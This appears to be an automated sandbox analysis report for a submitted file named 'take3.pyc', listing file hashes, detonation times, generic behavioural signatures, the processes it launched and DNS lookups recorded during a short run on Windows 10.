C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\startupCache\webext.sc.lz4
| MD5 | 38098fb118638df0a0118395c3a7e7e1 |
| SHA1 | 1f71a9a1678b353327a0aef5e4c6b10f391138a8 |
| SHA256 | 4ca755ea5212de953f535f769d103c1df4414a1e2fa3e656a2f63a8a352d7b50 |
| SHA512 | 974047df6bafc8b7d35e0dc951e8825fb8b3d089260ddc5d2c52f27c381a38349fa37b338e15f35ba7e52fafb7ef6cde205d0dbbed9cdf63e85465c0d5936251 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | b6d544f66af423aeb5a7872224ac1036 |
| SHA1 | 96d379afec895ef3529acfb27f68b3e110df646b |
| SHA256 | dd6365ee30ae7be021fef291fee26caa1911847513243d219a4f773a8e757648 |
| SHA512 | 0aea6889992317ff7c27cc5f1e2af9878d7614759b9cbc297cd22f28b436b7bc102acdb6ad5263266ca271758d462cefc8fd85189f5eb46ee272ab39bbf0de86 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | fabea81520534cf266d848dc68c5a1b7 |
| SHA1 | 5e08b8873064193d696544fcbaccaecf97730033 |
| SHA256 | a7ff057af5f600ef3fb56c348725036a1accf35a565da3dd97c4595ae6e7b8df |
| SHA512 | 064efbdf23b75e4fab553239fff0956b2f903f5cffc4dbbed4d3ff08f616744767ee3d931c251c81ba03eecf6d2a7a195ba8762313a8cfa610b516ae98dc5a9a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 13:22
Reported
2024-12-04 13:25
Platform
win10ltsc2021-20241023-en
Max time kernel
100s
Max time network
145s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\take3.pyc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |